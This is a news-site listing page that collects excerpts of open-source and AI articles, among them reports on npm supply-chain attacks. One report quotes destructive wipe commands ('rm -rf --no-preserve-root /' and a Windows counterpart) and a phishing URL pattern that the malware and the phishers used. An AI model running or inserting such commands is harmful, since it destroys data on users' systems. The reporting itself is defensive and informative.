Open Source

software-packages-with-more-than-2-billion-weekly-downloads-hit-in-supply-chain-attack

Software packages with more than 2 billion weekly downloads hit in supply-chain attack

Hackers planted malicious code in open source software packages with more than 2 billion weekly updates in what is likely to be the world’s biggest supply-chain attack ever.

The attack, which compromised nearly two dozen packages hosted on the npm repository, came to public notice on Monday in social media posts. Around the same time, Josh Junon, a maintainer or co-maintainer of the affected packages, said he had been “pwned” after falling for an email that claimed his account on the platform would be closed unless he logged in to a site and updated his two-factor authentication credentials.

Defeating 2FA the easy way

“Sorry everyone, I should have paid more attention,” Junon, who uses the moniker Qix, wrote. “Not like me; have had a stressful week. Will work to get this cleaned up.”

The unknown attackers behind the account compromise wasted no time capitalizing on it. Within an hour’s time, dozens of open source packages Junon oversees had received updates that added malicious code for transferring cryptocurrency payments to attacker-controlled wallets. With more than 280 lines of code, the addition worked by monitoring infected systems for cryptocurrency transactions and changing the addresses of wallets receiving payments to those controlled by the attacker.

The packages that were compromised, which at last count numbered 20, included some of the most foundational code driving the JavaScript ecosystem. They are used outright and also have thousands of dependents, meaning other npm packages that don’t work unless they are also installed. (npm is the official code repository for JavaScript files.)

“The overlap with such high-profile projects significantly increases the blast radius of this incident,” researchers from security firm Socket said. “By compromising Qix, the attackers gained the ability to push malicious versions of packages that are indirectly depended on by countless applications, libraries, and frameworks.”

The researchers added: “Given the scope and the selection of packages impacted, this appears to be a targeted attack designed to maximize reach across the ecosystem.”

The email message Junon fell for came from an email address at support.npmjs.help, a domain created three days ago to mimic the official npmjs.com used by npm. It said Junon’s account would be closed unless he updated information related to his 2FA—which requires users to present a physical security key or supply a one-time passcode provided by an authenticator app in addition to a password when logging in.

Software packages with more than 2 billion weekly downloads hit in supply-chain attack Read More »

microsoft-open-sources-bill-gates’-6502-basic-from-1978

Microsoft open-sources Bill Gates’ 6502 BASIC from 1978

On Wednesday, Microsoft released the complete source code for Microsoft BASIC for 6502 Version 1.1, the 1978 interpreter that powered the Commodore PET, VIC-20, Commodore 64, and Apple II through custom adaptations. The company posted 6,955 lines of assembly language code to GitHub under an MIT license, allowing anyone to freely use, modify, and distribute the code that helped launch the personal computer revolution.

“Rick Weiland and I (Bill Gates) wrote the 6502 BASIC,” Gates commented on the Page Table blog in 2010. “I put the WAIT command in.”

For millions of people in the late 1970s and early 1980s, variations of Microsoft’s BASIC interpreter provided their first experience with programming. Users could type simple commands like “10 PRINT ‘HELLO'” and “20 GOTO 10” to create an endless loop of text on their screens, for example—often their first taste of controlling a computer directly. The interpreter translated these human-readable commands into instructions that the processor could execute, one line at a time.

The Commodore PET (Personal Electronic Transactor) was released in January 1977 and used the MOS 6502 and ran a variation of Microsoft BASIC. Credit: SSPL/Getty Images

At just 6,955 lines of assembly language—Microsoft’s low-level 6502 code talked almost directly to the processor. Microsoft’s BASIC squeezed remarkable functionality into minimal memory, a key achievement when RAM cost hundreds of dollars per kilobyte.

In the early personal computer space, cost was king. The MOS 6502 processor that ran this BASIC cost about $25, while competitors charged $200 for similar chips. Designer Chuck Peddle created the 6502 specifically to bring computing to the masses, and manufacturers built variations of the chip into the Atari 2600, Nintendo Entertainment System, and millions of Commodore computers.

The deal that got away

In 1977, Commodore licensed Microsoft’s 6502 BASIC for a flat fee of $25,000. Jack Tramiel’s company got perpetual rights to ship the software in unlimited machines—no royalties, no per-unit fees. While $25,000 seemed substantial then, Commodore went on to sell millions of computers with Microsoft BASIC inside. Had Microsoft negotiated a per-unit licensing fee like they did with later products, the deal could have generated tens of millions in revenue.

The version Microsoft released—labeled 1.1—contains bug fixes that Commodore engineer John Feagans and Bill Gates jointly implemented in 1978 when Feagans traveled to Microsoft’s Bellevue offices. The code includes memory management improvements (called “garbage collection” in programming terms) and shipped as “BASIC V2” on the Commodore PET.

Microsoft open-sources Bill Gates’ 6502 BASIC from 1978 Read More »

new-ai-model-turns-photos-into-explorable-3d-worlds,-with-caveats

New AI model turns photos into explorable 3D worlds, with caveats

Training with automated data pipeline

Voyager builds on Tencent’s earlier HunyuanWorld 1.0, released in July. Voyager is also part of Tencent’s broader “Hunyuan” ecosystem, which includes the Hunyuan3D-2 model for text-to-3D generation and the previously covered HunyuanVideo for video synthesis.

To train Voyager, researchers developed software that automatically analyzes existing videos to process camera movements and calculate depth for every frame—eliminating the need for humans to manually label thousands of hours of footage. The system processed over 100,000 video clips from both real-world recordings and the aforementioned Unreal Engine renders.

A diagram of the Voyager world creation pipeline.

A diagram of the Voyager world creation pipeline. Credit: Tencent

The model demands serious computing power to run, requiring at least 60GB of GPU memory for 540p resolution, though Tencent recommends 80GB for better results. Tencent published the model weights on Hugging Face and included code that works with both single and multi-GPU setups.

The model comes with notable licensing restrictions. Like other Hunyuan models from Tencent, the license prohibits usage in the European Union, the United Kingdom, and South Korea. Additionally, commercial deployments serving over 100 million monthly active users require separate licensing from Tencent.

On the WorldScore benchmark developed by Stanford University researchers, Voyager reportedly achieved the highest overall score of 77.62, compared to 72.69 for WonderWorld and 62.15 for CogVideoX-I2V. The model reportedly excelled in object control (66.92), style consistency (84.89), and subjective quality (71.09), though it placed second in camera control (85.95) behind WonderWorld’s 92.98. WorldScore evaluates world generation approaches across multiple criteria, including 3D consistency and content alignment.

While these self-reported benchmark results seem promising, wider deployment still faces challenges due to the computational muscle involved. For developers needing faster processing, the system supports parallel inference across multiple GPUs using the xDiT framework. Running on eight GPUs delivers processing speeds 6.69 times faster than single-GPU setups.

Given the processing power required and the limitations in generating long, coherent “worlds,” it may be a while before we see real-time interactive experiences using a similar technique. But as we’ve seen so far with experiments like Google’s Genie, we’re potentially witnessing very early steps into a new interactive, generative art form.

New AI model turns photos into explorable 3D worlds, with caveats Read More »

college-student’s-“time-travel”-ai-experiment-accidentally-outputs-real-1834-history

College student’s “time travel” AI experiment accidentally outputs real 1834 history

A hobbyist developer building AI language models that speak Victorian-era English “just for fun” got an unexpected history lesson this week when his latest creation mentioned real protests from 1834 London—events the developer didn’t know had actually happened until he Googled them.

“I was interested to see if a protest had actually occurred in 1834 London and it really did happen,” wrote Reddit user Hayk Grigorian, who is a computer science student at Muhlenberg College in Pennsylvania.

For the past month, Grigorian has been developing what he calls TimeCapsuleLLM, a small AI language model (like a pint-sized distant cousin to ChatGPT) which has been trained entirely on texts from 1800–1875 London. Grigorian wants to capture an authentic Victorian voice in the AI model’s outputs. As a result, the AI model ends up spitting out text that’s heavy with biblical references and period-appropriate rhetorical excess.

Grigorian’s project joins a growing field of researchers exploring what some call “Historical Large Language Models” (HLLMs) if they feature a larger base model than the small one Grigorian is using. Similar projects include MonadGPT, which was trained on 11,000 texts from 1400 to 1700 CE that can discuss topics using 17th-century knowledge frameworks, and XunziALLM, which generates classical Chinese poetry following ancient formal rules. These models offer researchers a chance to interact with the linguistic patterns of past eras.

According to Grigorian, TimeCapsuleLLM’s most intriguing recent output emerged from a simple test. When he prompted it with “It was the year of our Lord 1834,” the AI model—which is trained to continue text from wherever a user leaves off—generated the following:

It was the year of our Lord 1834 and the streets of London were filled with protest and petition. The cause, as many re counted, was not bound in the way of private, but having taken up the same day in the day of Lord Palmerston, the public will receive a short statement of the difficulties under which the day of law has reached us. It is a matter of deep regret, that the present events in the history of the world are clear, and consequently will be’known. It is not true that the very men who first settled in the Gospel at Jerusalem should have so extensive and so interesting a record of the prosperity and prosperity

Curious about the accuracy, Grigorian did some fact-checking. “The output also brought up Lord Palmerston,” he wrote, “and after a google search I learned that his actions resulted in the 1834 protests.”

College student’s “time travel” AI experiment accidentally outputs real 1834 history Read More »

openai-releases-its-first-open-source-models-since-2019

OpenAI releases its first open source models since 2019

OpenAI is releasing new generative AI models today, and no, GPT-5 is not one of them. Depending on how you feel about generative AI, these new models may be even more interesting, though. The company is rolling out gpt-oss-120b and gpt-oss-20b, its first open weight models since the release of GPT-2 in 2019. You can download and run these models on your own hardware, with support for simulated reasoning, tool use, and deep customization.

When you access the company’s proprietary models in the cloud, they’re running on powerful server infrastructure that cannot be replicated easily, even in enterprise. The new OpenAI models come in two variants (120b and 20b) to be run on less powerful hardware configurations. Both are transformers with configurable chain of thought (CoT), supporting low, medium, and high settings. The lower settings are faster and use fewer compute resources, but the outputs are better with the highest setting. You can set the CoT level with a single line in the system prompt.

The smaller gpt-oss-20b has a total of 21 billion parameters, utilizing mixture-of-experts (MoE) to reduce that to 3.6 billion parameters per token. As for gpt-oss-120b, its 117 billion parameters come down to 5.1 billion per token with MoE. The company says the smaller model can run on a consumer-level machine with 16GB or more of memory. To run gpt-oss-120b, you need 80GB of memory, which is more than you’re likely to find in the average consumer machine. It should fit on a single AI accelerator GPU like the Nvidia H100, though. Both models have a context window of 128,000 tokens.

Credit: OpenAI

The team says users of gpt-oss can expect robust performance similar to its leading cloud-based models. The larger one benchmarks between the o3 and o4-mini proprietary models in most tests, with the smaller version running just a little behind. It gets closest in math and coding tasks. In the knowledge-based Humanity’s Last Exam, o3 is far out in front with 24.9 percent (with tools), while gpt-oss-120b only manages 19 percent. For comparison, Google’s leading Gemini Deep Think hits 34.8 percent in that test.

OpenAI releases its first open source models since 2019 Read More »

blender-developers-begin-work-on-full-fledged-mobile-version

Blender developers begin work on full-fledged mobile version

To that end, some features developed for the mobile version of Blender will cross-pollinate to desktop, like icon support for sidebar tabs and a helper overlay with curated shortcuts, among other things.

You can see some mockups over at the Blender blog. Development has begun in earnest on a new, separate branch for this tablet application. It will be developed first to target the iPad Pro and Apple Pencil, with other platforms and tablets to get tailored support later.

It sounds like the team already has some knowledgable designers and developers on this branch, but the blog post is also an invitation for new contributors. Specifically, it calls for “developers with extensive experience in this area” to contribute to building the application, touch events and gestures support, “File System / iCloud / AirDrop support,” and OpenSubdiv.

It sounds like things are already moving relatively quickly, as a tech demo is planned for SIGGRAPH 2025 in Vancouver next month.

Blender developers begin work on full-fledged mobile version Read More »

supply-chain-attacks-on-open-source-software-are-getting-out-of-hand

Supply-chain attacks on open source software are getting out of hand

sudo rm -rf --no-preserve-root /

The –no-preserve-root flag is specifically designed to override safety protections that would normally prevent deletion of the root directory.

The postinstall script that includes a Windows-equivalent destructive command was:

rm /s /q

Socket published a separate report Wednesday on yet more supply-chain attacks, one targeting npm users and another targeting users of PyPI. As of Wednesday, the four malicious packages—three published to npm and the fourth on PyPI—collectively had been downloaded more than 56,000 times. Socket said it was working to get them removed.

When installed, the packages “covertly integrate surveillance functionality into the developer’s environment, enabling keylogging, screen capture, fingerprinting, webcam access, and credential theft,” Socket researchers wrote. They added that the malware monitored and captured user activity and transmitted it to attacker-controlled infrastructure. Socket used the term surveillance malware to emphasize the covert observation and data exfiltration tactics “in the context of malicious dependencies.”

Last Friday, Socket reported the third attack. This one compromised an account on npm and used the access to plant malicious code inside three packages available on the site. The compromise occurred after the attackers successfully obtained a credential token that the developer used to authenticate to the site.

The attackers obtained the credential through a targeted phishing attack Socket had disclosed hours earlier. The email instructed the recipient to log in through a URL on npnjs.com. The site is a typosquatting spoof of the official npmjs.com domain. To make the attack more convincing, the phishing URL contained a token field that mimicked tokens npm uses for authentication. The phishing URL was in the format of https://npnjs.com/login?token=xxxxxx where the xxxxxx represented the token.

A phishing email targeting npm account holders.

Credit: Socket

A phishing email targeting npm account holders. Credit: Socket

Also compromised was an npm package known as ‘is.’ It receives roughly 2.8 million downloads weekly.

Potential for widespread damage

Supply-chain attacks like the ones Socket has flagged have the potential to cause widespread damage. Many packages available in repositories are dependencies, meaning the dependencies must be incorporated into downstream packages for those packages to work. In many developer flows, new dependency versions are downloaded and incorporated into the downstream packages automatically.

The packages flagged in the three attacks are:

  • @toptal/picasso-tailwind
  • @toptal/picasso-charts
  • @toptal/picasso-shared
  • @toptal/picasso-provider
  • @toptal/picasso-select
  • @toptal/picasso-quote
  • @toptal/picasso-forms
  • @xene/core
  • @toptal/picasso-utils
  • @toptal/picasso-typography.
  • is version 3.3.1, 5.0.0
  • got-fetch version 5.1.11, 5.1.12
  • Eslint-config-prettier, versions 8.10.1, 9.1.1, 10.1.6, and 10.1.7
  • Eslint-plugin-prettier, versions 4.2.2 and 4.2.3
  • Synckit, version 0.11.9
  • @pkgr/core, version 0.2.8
  • Napi-postinstall, version 0.3.1

Developers who work with any of the packages targeted should ensure none of the malicious versions have been installed or incorporated into their wares. Developers working with open source packages should:

  • Monitor repository visibility changes in search of suspicious or unusual publishing of packages
  • Review package.json lifecycle scripts before installing dependencies
  • Use automated security scanning in continuous integration and continuous delivery pipelines
  • Regularly rotate authentication tokens
  • Use multifactor authentication to safeguard repository accounts

Additionally, repositories that haven’t yet made MFA mandatory should do so in the near future.

Supply-chain attacks on open source software are getting out of hand Read More »

white-house-unveils-sweeping-plan-to-“win”-global-ai-race-through-deregulation

White House unveils sweeping plan to “win” global AI race through deregulation

Trump’s plan was not welcomed by everyone. J.B. Branch, Big Tech accountability advocate for Public Citizen, in a statement provided to Ars, criticized Trump as giving “sweetheart deals” to tech companies that would cause “electricity bills to rise to subsidize discounted power for massive AI data centers.”

Infrastructure demands and energy requirements

Trump’s new AI plan tackles infrastructure head-on, stating that “AI is the first digital service in modern life that challenges America to build vastly greater energy generation than we have today.” To meet this demand, it proposes streamlining environmental permitting for data centers through new National Environmental Policy Act (NEPA) exemptions, making federal lands available for construction and modernizing the power grid—all while explicitly rejecting “radical climate dogma and bureaucratic red tape.”

The document embraces what it calls a “Build, Baby, Build!” approach—echoing a Trump campaign slogan—and promises to restore semiconductor manufacturing through the CHIPS Program Office, though stripped of “extraneous policy requirements.”

On the technology front, the plan directs Commerce to revise NIST’s AI Risk Management Framework to “eliminate references to misinformation, Diversity, Equity, and Inclusion, and climate change.” Federal procurement would favor AI developers whose systems are “objective and free from top-down ideological bias.” The document strongly backs open source AI models and calls for exporting American AI technology to allies while blocking administration-labeled adversaries like China.

Security proposals include high-security military data centers and warnings that advanced AI systems “may pose novel national security risks” in cyberattacks and weapons development.

Critics respond with “People’s AI Action Plan”

Before the White House unveiled its plan, more than 90 organizations launched a competing “People’s AI Action Plan” on Tuesday, characterizing the Trump administration’s approach as “a massive handout to the tech industry” that prioritizes corporate interests over public welfare. The coalition includes labor unions, environmental justice groups, and consumer protection nonprofits.

White House unveils sweeping plan to “win” global AI race through deregulation Read More »

scientists-once-hoarded-pre-nuclear-steel;-now-we’re-hoarding-pre-ai-content

Scientists once hoarded pre-nuclear steel; now we’re hoarding pre-AI content

A time capsule of human expression

Graham-Cumming is no stranger to tech preservation efforts. He’s a British software engineer and writer best known for creating POPFile, an open source email spam filtering program, and for successfully petitioning the UK government to apologize for its persecution of codebreaker Alan Turing—an apology that Prime Minister Gordon Brown issued in 2009.

As it turns out, his pre-AI website isn’t new, but it has languished unannounced until now. “I created it back in March 2023 as a clearinghouse for online resources that hadn’t been contaminated with AI-generated content,” he wrote on his blog.

The website points to several major archives of pre-AI content, including a Wikipedia dump from August 2022 (before ChatGPT’s November 2022 release), Project Gutenberg’s collection of public domain books, the Library of Congress photo archive, and GitHub’s Arctic Code Vault—a snapshot of open source code buried in a former coal mine near the North Pole in February 2020. The wordfreq project appears on the list as well, flash-frozen from a time before AI contamination made its methodology untenable.

The site accepts submissions of other pre-AI content sources through its Tumblr page. Graham-Cumming emphasizes that the project aims to document human creativity from before the AI era, not to make a statement against AI itself. As atmospheric nuclear testing ended and background radiation returned to natural levels, low-background steel eventually became unnecessary for most uses. Whether pre-AI content will follow a similar trajectory remains a question.

Still, it feels reasonable to protect sources of human creativity now, including archival ones, because these repositories may become useful in ways that few appreciate at the moment. For example, in 2020, I proposed creating a so-called “cryptographic ark”—a timestamped archive of pre-AI media that future historians could verify as authentic, collected before my then-arbitrary cutoff date of January 1, 2022. AI slop pollutes more than the current discourse—it could cloud the historical record as well.

For now, lowbackgroundsteel.ai stands as a modest catalog of human expression from what may someday be seen as the last pre-AI era. It’s a digital archaeology project marking the boundary between human-generated and hybrid human-AI cultures. In an age where distinguishing between human and machine output grows increasingly difficult, these archives may prove valuable for understanding how human communication evolved before AI entered the chat.

Scientists once hoarded pre-nuclear steel; now we’re hoarding pre-AI content Read More »

engineer-creates-first-custom-motherboard-for-1990s-playstation-console

Engineer creates first custom motherboard for 1990s PlayStation console

The nsOne project joins a growing community of homebrew PlayStation 1 hardware developments. Other recent projects include Picostation, a Raspberry Pi Pico-based optical disc emulator (ODE) that allows PlayStation 1 consoles to load games from SD cards instead of physical discs. Other ODEs like MODE and PSIO have also become popular solutions for retrogaming collectors who play games on original hardware as optical drives age and fail.

From repair job to reverse-engineering project

To understand the classic console’s physical architecture, Brodesco physically sanded down an original motherboard to expose its internal layers, then cross-referenced the exposed traces with component datasheets and service manuals.

“I realized that detailed documentation on the original motherboard was either incomplete or entirely unavailable,” Brodesco explained in his Kickstarter campaign. This discovery launched what would become a comprehensive documentation effort, including tracing every connection on the board and creating multi-layer graphic representations of the circuitry.

A photo of the nsOne PlayStation motherboard.

A photo of the nsOne PlayStation motherboard. Credit: Lorentio Brodesco

Using optical scanning and manual net-by-net reverse-engineering, Brodesco recreated the PlayStation 1’s schematic in modern PCB design software. This process involved creating component symbols with accurate pin mappings and identifying—or in some cases creating—the correct footprints for each proprietary component that Sony had never publicly documented.

Brodesco also identified what he calls the “minimum architecture” required to boot the console without BIOS modifications, streamlining the design process while maintaining full compatibility.

The mock-up board shown in photos validates the footprints of chips and connectors, all redrawn from scratch. According to Brodesco, a fully routed version with complete multilayer routing and final layout is already in development.

A photo of the nsOne PlayStation motherboard.

A photo of the nsOne PlayStation motherboard. Credit: Lorentio Brodesco

As Brodesco noted on Kickstarter, his project’s goal is to “create comprehensive documentation, design files, and production-ready blueprints for manufacturing fully functional motherboards.”

Beyond repairs, the documentation and design files Brodesco is creating would preserve the PlayStation 1’s hardware architecture for future generations: “It’s a tribute to the PS1, to retro hardware, and to the belief that one person really can build the impossible.”

Engineer creates first custom motherboard for 1990s PlayStation console Read More »

hugging-face-clones-openai’s-deep-research-in-24-hours

Hugging Face clones OpenAI’s Deep Research in 24 hours

On Tuesday, Hugging Face researchers released an open source AI research agent called “Open Deep Research,” created by an in-house team as a challenge 24 hours after the launch of OpenAI’s Deep Research feature, which can autonomously browse the web and create research reports. The project seeks to match Deep Research’s performance while making the technology freely available to developers.

“While powerful LLMs are now freely available in open-source, OpenAI didn’t disclose much about the agentic framework underlying Deep Research,” writes Hugging Face on its announcement page. “So we decided to embark on a 24-hour mission to reproduce their results and open-source the needed framework along the way!”

Similar to both OpenAI’s Deep Research and Google’s implementation of its own “Deep Research” using Gemini (first introduced in December—before OpenAI), Hugging Face’s solution adds an “agent” framework to an existing AI model to allow it to perform multi-step tasks, such as collecting information and building the report as it goes along that it presents to the user at the end.

The open source clone is already racking up comparable benchmark results. After only a day’s work, Hugging Face’s Open Deep Research has reached 55.15 percent accuracy on the General AI Assistants (GAIA) benchmark, which tests an AI model’s ability to gather and synthesize information from multiple sources. OpenAI’s Deep Research scored 67.36 percent accuracy on the same benchmark.

As Hugging Face points out in its post, GAIA includes complex multi-step questions such as this one:

Which of the fruits shown in the 2008 painting “Embroidery from Uzbekistan” were served as part of the October 1949 breakfast menu for the ocean liner that was later used as a floating prop for the film “The Last Voyage”? Give the items as a comma-separated list, ordering them in clockwise order based on their arrangement in the painting starting from the 12 o’clock position. Use the plural form of each fruit.

To correctly answer that type of question, the AI agent must seek out multiple disparate sources and assemble them into a coherent answer. Many of the questions in GAIA represent no easy task, even for a human, so they test agentic AI’s mettle quite well.

Hugging Face clones OpenAI’s Deep Research in 24 hours Read More »

german-router-maker-is-latest-company-to-inadvertently-clarify-the-lgpl-license

German router maker is latest company to inadvertently clarify the LGPL license

The GNU General Public License (GPL) and its “Lesser” version (LGPL) are widely known and used. Still, every so often, a networking hardware maker has to get sued to make sure everyone knows how it works.

The latest such router company to face legal repercussions is AVM, the Berlin-based maker of the most popular home networking products in Germany. Sebastian Steck, a German software developer, bought an AVM Fritz!Box 4020 (PDF) and, being a certain type, requested the source code that had been used to generate certain versions of the firmware on it.

According to Steck’s complaint (translated to English and provided in PDF by the Software Freedom Conservancy, or SFC), he needed this code to recompile a networking library and add some logging to “determine which programs on the Fritz!Box establish connections to servers on the Internet and which data they send.” But Steck was also concerned about AVM’s adherence to GPL 2.0 and LGPL 2.1 licenses, under which its FRITZ!OS and various libraries were licensed. The SFC states that it provided a grant to Steck to pursue the matter.

AVM provided source code, but it was incomplete, as “the scripts for compilation and installation were missing,” according to Steck’s complaint. This included makefiles and details on environment variables, like “KERNEL_LAYOUT,” necessary for compilation. Steck notified AVM, AVM did not respond, and Steck sought legal assistance, ultimately including the SFC.

Months later, according to the SFC, AVM provided all the relevant source code and scripts, but the suit continued. AVM ultimately paid Steck’s attorney fee. The case proved, once again, that not only are source code requirements real, but the LGPL also demands freedom, despite its “Lesser” name, and that source code needs to be useful in making real changes to firmware—in German courts, at least.

“The favorable result of this lawsuit exemplifies the power of copyleft—granting users the freedom to modify, repair, and secure the software on their own devices,” the SFC said in a press release. “Companies like AVM receive these immense benefits themselves. This lawsuit reminded AVM that downstream users must receive those very same rights under copyleft.”

As noted by the SFC, the case was brought in July 2023, but as is typical with German law, no updates on the case could be provided until after its conclusion. SFC posted its complaint, documents, and the source code ultimately provided by AVM and encouraged the company to publish its own documents since those are not automatically public in Germany.

German router maker is latest company to inadvertently clarify the LGPL license Read More »